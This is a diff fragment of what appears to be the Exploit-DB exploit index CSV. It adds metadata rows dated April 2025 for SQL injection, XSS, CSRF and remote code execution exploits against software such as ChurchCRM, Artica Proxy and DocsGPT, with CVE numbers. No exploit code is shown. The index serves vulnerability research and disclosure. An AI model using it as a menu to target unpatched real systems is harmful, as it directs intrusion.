 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
+52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@@ -14285,6 +14289,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51215,exploits/php/webapps/51215.txt,"Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23162,,,,,
 51216,exploits/php/webapps/51216.txt,"Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23163,,,,,
 34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php,,2010-09-01,2014-09-08,1,,,,,,https://www.securityfocus.com/bid/42923/info
+52146,exploits/php/webapps/52146.py,"Artica Proxy 4.50 - Remote Code Execution (RCE)",2025-04-09,Madan,webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-2054,,,,,
 43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,,2017-12-01,2017-12-01,0,CVE-2017-17055,,,,,
 31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php,,2008-01-15,2014-01-19,1,CVE-2008-0286;OSVDB-40273,,,,,https://www.securityfocus.com/bid/27286/info
 4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,webapps,php,,2007-07-23,,1,OSVDB-39107;CVE-2007-4007,,,,,
@@ -15788,6 +15793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
 50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
 51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
+52152,exploits/php/webapps/52152.NA,"ChurchCRM 5.9.1 - SQL Injection",2025-04-09,"Sanan Qasimzada",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39304,,,,,
 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
 51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
@@ -28677,6 +28683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
 29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
 26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,webapps,php,,2005-07-21,2013-06-08,1,,,,,,https://www.securityfocus.com/bid/14343/info
+52153,exploits/php/webapps/52153.NA,"PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)",2025-04-09,"Vuln Seeker Cybersecurity Team",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-6244,,,,,
 8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,webapps,php,,2009-02-09,2017-02-08,1,,,,,,
 26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],webapps,php,,2005-11-26,2013-07-05,1,CVE-2005-3859;OSVDB-21137,,,,,https://www.securityfocus.com/bid/15576/info
 16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",webapps,php,,2011-02-05,2011-02-05,1,,,,,,
@@ -29037,6 +29044,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
 43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
 48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
+52150,exploits/php/webapps/52150.NA,"ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)",2025-04-09,"Jeremia Geraldi Sihombing",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39143,,,,,
 35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,
 46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80,2019-01-28,2019-01-28,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
 46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80,2019-02-04,2019-02-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
@@ -35043,6 +35051,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
 51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
+52145,exploits/python/webapps/52145.py,"DocsGPT 0.12.0 - Remote Code Execution",2025-04-09,"Shreyas Malhotra",webapps,python,,2025-04-09,2025-04-09,1,CVE-2025-0868,,,,,
 51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,